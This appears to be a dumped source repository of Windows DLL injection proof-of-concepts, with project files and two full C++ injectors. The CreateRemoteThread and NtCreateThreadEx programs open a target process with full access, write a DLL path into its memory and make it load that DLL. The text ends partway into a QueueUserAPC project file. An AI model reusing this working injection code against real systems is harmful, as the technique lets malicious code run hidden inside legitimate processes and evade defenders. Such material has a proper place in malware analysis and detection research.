├── .gitignore ├── DLLInjection-CreateRemoteThread ├── DLLInjection-CreateRemoteThread.sln └── DLLInjection-CreateRemoteThread │ ├── DLLInjection-CreateRemoteThread.cpp │ ├── DLLInjection-CreateRemoteThread.vcxproj │ ├── DLLInjection-CreateRemoteThread.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-NtCreateThreadEx ├── DLLInjection-NtCreateThreadEx.sln └── DLLInjection-NtCreateThreadEx │ ├── DLLInjection-NtCreateThreadEx.cpp │ ├── DLLInjection-NtCreateThreadEx.vcxproj │ ├── DLLInjection-NtCreateThreadEx.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-QueueUserAPC ├── DLLInjection-QueueUserAPC.sln └── DLLInjection-QueueUserAPC │ ├── DLLInjection-QueueUserAPC.cpp │ ├── DLLInjection-QueueUserAPC.vcxproj │ ├── DLLInjection-QueueUserAPC.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-RtlCreateUserThread ├── DLLInjection-RtlCreateUserThread.sln └── DLLInjection-RtlCreateUserThread │ ├── DLLInjection-RtlCreateUserThread.cpp │ ├── DLLInjection-RtlCreateUserThread.vcxproj │ ├── DLLInjection-RtlCreateUserThread.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── DLLInjection-SetWindowsHookEx ├── DLLInjection-SetWindowsHookEx.sln └── DLLInjection-SetWindowsHookEx │ ├── DLLInjection-SetWindowsHookEx.cpp │ ├── DLLInjection-SetWindowsHookEx.vcxproj │ ├── DLLInjection-SetWindowsHookEx.vcxproj.filters │ ├── pch.cpp │ └── pch.h ├── PoC_Dll ├── PoC_Dll.sln └── PoC_Dll │ ├── PoC_Dll.cpp │ ├── PoC_Dll.vcxproj │ ├── PoC_Dll.vcxproj.filters │ ├── dllmain.cpp │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── README.md └── SuspendInjectResume ├── SuspendInjectResume.sln └── SuspendInjectResume ├── SuspendInjectResume.cpp ├── SuspendInjectResume.vcxproj ├── SuspendInjectResume.vcxproj.filters ├── pch.cpp └── pch.h /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.suo 8 | *.user 9 | *.userosscache 10 | *.sln.docstates 11 | 12 | # User-specific files (MonoDevelop/Xamarin Studio) 13 | *.userprefs 14 | 15 | # Build results 16 | [Dd]ebug/ 17 | [Dd]ebugPublic/ 18 | [Rr]elease/ 19 | [Rr]eleases/ 20 | x64/ 21 | x86/ 22 | bld/ 23 | [Bb]in/ 24 | [Oo]bj/ 25 | [Ll]og/ 26 | 27 | # Visual Studio 2015/2017 cache/options directory 28 | .vs/ 29 | # Uncomment if you have tasks that create the project's static files in wwwroot 30 | #wwwroot/ 31 | 32 | # Visual Studio 2017 auto generated files 33 | Generated\ Files/ 34 | 35 | # MSTest test Results 36 | [Tt]est[Rr]esult*/ 37 | [Bb]uild[Ll]og.* 38 | 39 | # NUNIT 40 | *.VisualState.xml 41 | TestResult.xml 42 | 43 | # Build Results of an ATL Project 44 | [Dd]ebugPS/ 45 | [Rr]eleasePS/ 46 | dlldata.c 47 | 48 | # Benchmark Results 49 | BenchmarkDotNet.Artifacts/ 50 | 51 | # .NET Core 52 | project.lock.json 53 | project.fragment.lock.json 54 | artifacts/ 55 | **/Properties/launchSettings.json 56 | 57 | # StyleCop 58 | StyleCopReport.xml 59 | 60 | # Files built by Visual Studio 61 | *_i.c 62 | *_p.c 63 | *_i.h 64 | *.ilk 65 | *.meta 66 | *.obj 67 | *.iobj 68 | *.pch 69 | *.pdb 70 | *.ipdb 71 | *.pgc 72 | *.pgd 73 | *.rsp 74 | *.sbr 75 | *.tlb 76 | *.tli 77 | *.tlh 78 | *.tmp 79 | *.tmp_proj 80 | *.log 81 | *.vspscc 82 | *.vssscc 83 | .builds 84 | *.pidb 85 | *.svclog 86 | *.scc 87 | 88 | # Chutzpah Test files 89 | _Chutzpah* 90 | 91 | # Visual C++ cache files 92 | ipch/ 93 | *.aps 94 | *.ncb 95 | *.opendb 96 | *.opensdf 97 | *.sdf 98 | *.cachefile 99 | *.VC.db 100 | *.VC.VC.opendb 101 | 102 | # Visual Studio profiler 103 | *.psess 104 | *.vsp 105 | *.vspx 106 | *.sap 107 | 108 | # Visual Studio Trace Files 109 | *.e2e 110 | 111 | # TFS 2012 Local Workspace 112 | $tf/ 113 | 114 | # Guidance Automation Toolkit 115 | *.gpState 116 | 117 | # ReSharper is a .NET coding add-in 118 | _ReSharper*/ 119 | *.[Rr]e[Ss]harper 120 | *.DotSettings.user 121 | 122 | # JustCode is a .NET coding add-in 123 | .JustCode 124 | 125 | # TeamCity is a build add-in 126 | _TeamCity* 127 | 128 | # DotCover is a Code Coverage Tool 129 | *.dotCover 130 | 131 | # AxoCover is a Code Coverage Tool 132 | .axoCover/* 133 | !.axoCover/settings.json 134 | 135 | # Visual Studio code coverage results 136 | *.coverage 137 | *.coveragexml 138 | 139 | # NCrunch 140 | _NCrunch_* 141 | .*crunch*.local.xml 142 | nCrunchTemp_* 143 | 144 | # MightyMoose 145 | *.mm.* 146 | AutoTest.Net/ 147 | 148 | # Web workbench (sass) 149 | .sass-cache/ 150 | 151 | # Installshield output folder 152 | [Ee]xpress/ 153 | 154 | # DocProject is a documentation generator add-in 155 | DocProject/buildhelp/ 156 | DocProject/Help/*.HxT 157 | DocProject/Help/*.HxC 158 | DocProject/Help/*.hhc 159 | DocProject/Help/*.hhk 160 | DocProject/Help/*.hhp 161 | DocProject/Help/Html2 162 | DocProject/Help/html 163 | 164 | # Click-Once directory 165 | publish/ 166 | 167 | # Publish Web Output 168 | *.[Pp]ublish.xml 169 | *.azurePubxml 170 | # Note: Comment the next line if you want to checkin your web deploy settings, 171 | # but database connection strings (with potential passwords) will be unencrypted 172 | *.pubxml 173 | *.publishproj 174 | 175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 176 | # checkin your Azure Web App publish settings, but sensitive information contained 177 | # in these scripts will be unencrypted 178 | PublishScripts/ 179 | 180 | # NuGet Packages 181 | *.nupkg 182 | # The packages folder can be ignored because of Package Restore 183 | **/[Pp]ackages/* 184 | # except build/, which is used as an MSBuild target. 185 | !**/[Pp]ackages/build/ 186 | # Uncomment if necessary however generally it will be regenerated when needed 187 | #!**/[Pp]ackages/repositories.config 188 | # NuGet v3's project.json files produces more ignorable files 189 | *.nuget.props 190 | *.nuget.targets 191 | 192 | # Microsoft Azure Build Output 193 | csx/ 194 | *.build.csdef 195 | 196 | # Microsoft Azure Emulator 197 | ecf/ 198 | rcf/ 199 | 200 | # Windows Store app package directories and files 201 | AppPackages/ 202 | BundleArtifacts/ 203 | Package.StoreAssociation.xml 204 | _pkginfo.txt 205 | *.appx 206 | 207 | # Visual Studio cache files 208 | # files ending in .cache can be ignored 209 | *.[Cc]ache 210 | # but keep track of directories ending in .cache 211 | !*.[Cc]ache/ 212 | 213 | # Others 214 | ClientBin/ 215 | ~$* 216 | *~ 217 | *.dbmdl 218 | *.dbproj.schemaview 219 | *.jfm 220 | *.pfx 221 | *.publishsettings 222 | orleans.codegen.cs 223 | 224 | # Including strong name files can present a security risk 225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 226 | #*.snk 227 | 228 | # Since there are multiple workflows, uncomment next line to ignore bower_components 229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 230 | #bower_components/ 231 | 232 | # RIA/Silverlight projects 233 | Generated_Code/ 234 | 235 | # Backup & report files from converting an old project file 236 | # to a newer Visual Studio version. Backup files are not needed, 237 | # because we have git ;-) 238 | _UpgradeReport_Files/ 239 | Backup*/ 240 | UpgradeLog*.XML 241 | UpgradeLog*.htm 242 | ServiceFabricBackup/ 243 | *.rptproj.bak 244 | 245 | # SQL Server files 246 | *.mdf 247 | *.ldf 248 | *.ndf 249 | 250 | # Business Intelligence projects 251 | *.rdl.data 252 | *.bim.layout 253 | *.bim_*.settings 254 | *.rptproj.rsuser 255 | 256 | # Microsoft Fakes 257 | FakesAssemblies/ 258 | 259 | # GhostDoc plugin setting file 260 | *.GhostDoc.xml 261 | 262 | # Node.js Tools for Visual Studio 263 | .ntvs_analysis.dat 264 | node_modules/ 265 | 266 | # Visual Studio 6 build log 267 | *.plg 268 | 269 | # Visual Studio 6 workspace options file 270 | *.opt 271 | 272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 273 | *.vbw 274 | 275 | # Visual Studio LightSwitch build output 276 | **/*.HTMLClient/GeneratedArtifacts 277 | **/*.DesktopClient/GeneratedArtifacts 278 | **/*.DesktopClient/ModelManifest.xml 279 | **/*.Server/GeneratedArtifacts 280 | **/*.Server/ModelManifest.xml 281 | _Pvt_Extensions 282 | 283 | # Paket dependency manager 284 | .paket/paket.exe 285 | paket-files/ 286 | 287 | # FAKE - F# Make 288 | .fake/ 289 | 290 | # JetBrains Rider 291 | .idea/ 292 | *.sln.iml 293 | 294 | # CodeRush 295 | .cr/ 296 | 297 | # Python Tools for Visual Studio (PTVS) 298 | __pycache__/ 299 | *.pyc 300 | 301 | # Cake - Uncomment if you are using it 302 | # tools/** 303 | # !tools/packages.config 304 | 305 | # Tabs Studio 306 | *.tss 307 | 308 | # Telerik's JustMock configuration file 309 | *.jmconfig 310 | 311 | # BizTalk build output 312 | *.btp.cs 313 | *.btm.cs 314 | *.odx.cs 315 | *.xsd.cs 316 | 317 | # OpenCover UI analysis results 318 | OpenCover/ 319 | 320 | # Azure Stream Analytics local run output 321 | ASALocalRun/ 322 | 323 | # MSBuild Binary and Structured Log 324 | *.binlog 325 | 326 | # NVidia Nsight GPU debugger configuration file 327 | *.nvuser 328 | 329 | # MFractors (Xamarin productivity tool) working folder 330 | .mfractor/ 331 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-CreateRemoteThread", "DLLInjection-CreateRemoteThread\DLLInjection-CreateRemoteThread.vcxproj", "{8D5696CE-04F9-4883-83D2-A7808CE673CC}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x64.ActiveCfg = Debug|x64 17 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x64.Build.0 = Debug|x64 18 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x86.ActiveCfg = Debug|Win32 19 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Debug|x86.Build.0 = Debug|Win32 20 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x64.ActiveCfg = Release|x64 21 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x64.Build.0 = Release|x64 22 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x86.ActiveCfg = Release|Win32 23 | {8D5696CE-04F9-4883-83D2-A7808CE673CC}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C52ED0CF-6405-4CB3-A81B-88859FB280CF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-CreateRemoteThread.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include 7 | #include 8 | 9 | using namespace std; 10 | 11 | bool inject(int processid) 12 | { 13 | HANDLE hProcess, AllocAdresse, hRemoteThread; 14 | int pid = processid; 15 | char dll_path[] = "C:\\DLLTest.dll"; 16 | SIZE_T dll_len = sizeof(dll_path); 17 | 18 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid); 19 | if (hProcess == NULL) 20 | { 21 | cout << "[*] Could not create a handle to the process PID: " << pid << "\n"; 22 | return FALSE; 23 | } 24 | 25 | AllocAdresse = VirtualAllocEx(hProcess, 0, dll_len, MEM_COMMIT, PAGE_READWRITE); 26 | 27 | SIZE_T *written = 0; 28 | WriteProcessMemory(hProcess, (void*)AllocAdresse, (void*)dll_path, dll_len, written); 29 | 30 | 31 | LPDWORD thread_id = 0; 32 | hRemoteThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"), AllocAdresse, 0, thread_id); 33 | 34 | if (hRemoteThread == NULL) 35 | { 36 | cout << "Could not create a remote thread!\n"; 37 | return FALSE; 38 | } 39 | 40 | cout << "RemoteThread was created.\n"; 41 | WaitForSingleObject(hRemoteThread, INFINITE); 42 | cout << "Finished!\n"; 43 | VirtualFreeEx(hProcess, AllocAdresse, dll_len, MEM_RESERVE); 44 | CloseHandle(hProcess); 45 | return TRUE; 46 | } 47 | 48 | // steps: 49 | // OpenProcess 50 | // hRemoteThread = virtualAllocEx 51 | // WriteProcessMemory() 52 | // hRemoteThread = CreateRemoteThread() 53 | // WaitForSingleObject 54 | 55 | // Injection off dll by remote thread 56 | // check for injection of exe as remote thread 57 | // injection techniques of dll 58 | // check for traps 59 | // in 60 | 61 | 62 | int main(void) 63 | { 64 | HANDLE hSnapshot; 65 | PROCESSENTRY32 ProcessEntry; 66 | ProcessEntry.dwSize = sizeof(PROCESSENTRY32); 67 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 68 | bool injected = FALSE; 69 | 70 | if (Process32First(hSnapshot, &ProcessEntry)) 71 | { 72 | do 73 | { 74 | cout << ProcessEntry.th32ProcessID << "\t" << ProcessEntry.szExeFile << "\n"; 75 | if (injected == FALSE) 76 | { 77 | // injected = inject(ProcessEntry.th32ProcessID); 78 | injected = inject(4264); 79 | } 80 | } while (Process32Next(hSnapshot, &ProcessEntry)); 81 | } 82 | CloseHandle(hSnapshot); 83 | getchar(); 84 | } 85 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8D5696CE-04F9-4883-83D2-A7808CE673CC} 24 | Win32Proj 25 | DLLInjectionCreateRemoteThread 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-CreateRemoteThread/DLLInjection-CreateRemoteThread/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-NtCreateThreadEx", "DLLInjection-NtCreateThreadEx\DLLInjection-NtCreateThreadEx.vcxproj", "{9867742A-F287-47D6-ADA2-D4549533B7FE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x64.ActiveCfg = Debug|x64 17 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x64.Build.0 = Debug|x64 18 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x86.ActiveCfg = Debug|Win32 19 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Debug|x86.Build.0 = Debug|Win32 20 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x64.ActiveCfg = Release|x64 21 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x64.Build.0 = Release|x64 22 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x86.ActiveCfg = Release|Win32 23 | {9867742A-F287-47D6-ADA2-D4549533B7FE}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {BFCAA45A-63CF-480A-B35A-DAE2E7E2D585} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.cpp: -------------------------------------------------------------------------------- 1 | // DLLInjection-NtCreateThreadEx.cpp : This file contains the 'main' function. Program execution 2 | // begins and ends there. 3 | 4 | 5 | #include "pch.h" 6 | #include 7 | #include 8 | #include 9 | 10 | HANDLE NtCreateThreadEx( 11 | HANDLE hProcess, 12 | LPVOID lpBaseAddress, 13 | LPVOID lpSpace 14 | ) 15 | { 16 | //The prototype of NtCreateThreadEx from undocumented.ntinternals.com 17 | typedef DWORD(WINAPI * functypeNtCreateThreadEx)( 18 | PHANDLE ThreadHandle, 19 | ACCESS_MASK DesiredAccess, 20 | LPVOID ObjectAttributes, 21 | HANDLE ProcessHandle, 22 | LPTHREAD_START_ROUTINE lpStartAddress, 23 | LPVOID lpParameter, 24 | BOOL CreateSuspended, 25 | DWORD dwStackSize, 26 | DWORD Unknown1, 27 | DWORD Unknown2, 28 | LPVOID Unknown3 29 | ); 30 | HANDLE hRemoteThread = NULL; 31 | HMODULE hNtDllModule = NULL; 32 | functypeNtCreateThreadEx funcNtCreateThreadEx = NULL; 33 | //Get handle for ntdll which contains NtCreateThreadEx 34 | hNtDllModule = GetModuleHandle("ntdll.dll"); 35 | if (hNtDllModule == NULL) 36 | { 37 | return NULL; 38 | } 39 | funcNtCreateThreadEx = (functypeNtCreateThreadEx)GetProcAddress(hNtDllModule, "NtCreateThreadEx"); 40 | if (!funcNtCreateThreadEx) 41 | { 42 | return NULL; 43 | } 44 | funcNtCreateThreadEx(&hRemoteThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, lpSpace, FALSE, NULL, NULL, NULL, NULL); 45 | return hRemoteThread; 46 | } 47 | 48 | int injectIntoPID(int process) 49 | { 50 | DWORD pid = (DWORD)process; 51 | const char* dll = "C:\\v.dll"; 52 | //Gets the process handle for the target process 53 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 54 | if (OpenProcess == NULL) 55 | { 56 | puts("Could not find process"); 57 | } 58 | //Retrieves kernel32.dll module handle for getting loadlibrary base address 59 | HMODULE hModule = GetModuleHandle("kernel32.dll"); 60 | //Gets address for LoadLibraryA in kernel32.dll 61 | LPVOID lpBaseAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryA"); 62 | if (lpBaseAddress == NULL) 63 | { 64 | puts("Unable to locate LoadLibraryA"); 65 | return -1; 66 | } 67 | //Allocates space inside for inject.dll to our target process 68 | LPVOID lpSpace = (LPVOID)VirtualAllocEx(hProcess, NULL, strlen(dll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 69 | if (lpSpace == NULL) 70 | { 71 | printf("Could not allocate memory in process %u", (int)process); 72 | return -1; 73 | } 74 | //Write inject.dll to memory of process 75 | int n = WriteProcessMemory(hProcess, lpSpace, dll, strlen(dll), NULL); 76 | if (n == 0) 77 | { 78 | puts("Could not write to process's address space"); 79 | return -1; 80 | } 81 | HANDLE hThread; 82 | 83 | hThread = NtCreateThreadEx(hProcess, lpBaseAddress, lpSpace); 84 | if (hThread == NULL) 85 | { 86 | return -1; 87 | } 88 | else 89 | { 90 | DWORD threadId = GetThreadId(hThread); 91 | DWORD processId = GetProcessIdOfThread(hThread); 92 | printf("Injected thread id: %u for pid: %u", threadId, processId); 93 | getchar(); 94 | getchar(); 95 | getchar(); 96 | CloseHandle(hProcess); 97 | return 0; 98 | } 99 | } 100 | 101 | int main(int argc, char* argv) 102 | { 103 | int pid; 104 | puts("Inject into which PID: "); 105 | scanf_s("%u", &pid); 106 | puts("Method used to attach thread is : NtCreateThread"); 107 | int result = injectIntoPID(pid); 108 | if (result == -1) 109 | { 110 | puts("Could not inject into PID"); 111 | } 112 | system("pause"); 113 | } 114 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {9867742A-F287-47D6-ADA2-D4549533B7FE} 24 | Win32Proj 25 | DLLInjectionNtCreateThreadEx 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-NtCreateThreadEx/DLLInjection-NtCreateThreadEx/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DLLInjection-QueueUserAPC/DLLInjection-QueueUserAPC.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLInjection-QueueUserAPC", "DLLInjection-QueueUserAPC\DLLInjection-QueueUserAPC.vcxproj", "{441CCAD0-919A-4882-87A6-DB9834766DC4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | 